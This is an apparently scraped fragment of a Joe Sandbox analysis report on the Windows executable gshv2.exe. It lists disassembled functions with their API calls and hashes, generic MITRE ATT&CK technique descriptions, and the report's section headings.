Function 00007FF62C0B8D70 Relevance: 5.2, APIs: 4, Instructions: 237COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B8E19
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B8E7F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B9128
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B914F

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: ec3e9623ea8803e7c10f5c9c5fd16f31160b46dcd3912112c4944d8f7bc9fb38
Instruction ID: 4527abe2cbdbdca5118dea77fba03a610d89ff3a67b6242f9dacf91d647792cd
Opcode Fuzzy Hash: ec3e9623ea8803e7c10f5c9c5fd16f31160b46dcd3912112c4944d8f7bc9fb38
Instruction Fuzzy Hash: 17A12B22E14B9585EB21DB35D4442BEB3B4FF99B94F049332EF8952664DF3AE482C701

Function 00007FF62C0B2390 Relevance: 5.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A81FF), ref: 00007FF62C0B240A
memcpy.VCRUNTIME140(?,?,?,00007FF62C0A81FF), ref: 00007FF62C0B2425
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A81FF), ref: 00007FF62C0B244C
memcpy.VCRUNTIME140(?,?,?,00007FF62C0A81FF), ref: 00007FF62C0B2476

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 521e352762d68c93842951c13a3d6e3656fcf514fe1801a85e808f798ed414ab
Instruction ID: 0a5d6ade01be802a18433dc003c248d278797638473fb143c2756405136c22c7
Opcode Fuzzy Hash: 521e352762d68c93842951c13a3d6e3656fcf514fe1801a85e808f798ed414ab
Instruction Fuzzy Hash: DF3180B6B09B8586EF04CF15D8401786361FF88F94B189032DA8D87759CF29E482C342

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gshv2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
gshv2.exe

Function 00007FF62C0CCFD0 Relevance: 216.1, APIs: 104, Strings: 19, Instructions: 826
threadprocesssleepCOMMON

Function 00007FF62C0C73B0 Relevance: 3.0, APIs: 2, Instructions: 10
keyboardCOMMON

Function 00007FF62C0CFDBC Relevance: 13.6, APIs: 9, Instructions: 94
COMMON

Function 00007FF62C0C5EF0 Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Function 00007FF62C0C9F80 Relevance: 136.5, APIs: 11, Strings: 66, Instructions: 1778
keyboardCOMMON

Function 00007FF62C0CE300 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 254
windowkeyboardCOMMON

Function 00007FF62C0B4D50 Relevance: 15.8, APIs: 10, Instructions: 832
COMMON

Function 00007FF62C0A6770 Relevance: 34.8, APIs: 23, Instructions: 311
COMMON

Function 00007FF62C0C7570 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 359
sleepCOMMON

Function 00007FF62C0CE170 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 81
registrythreadCOMMON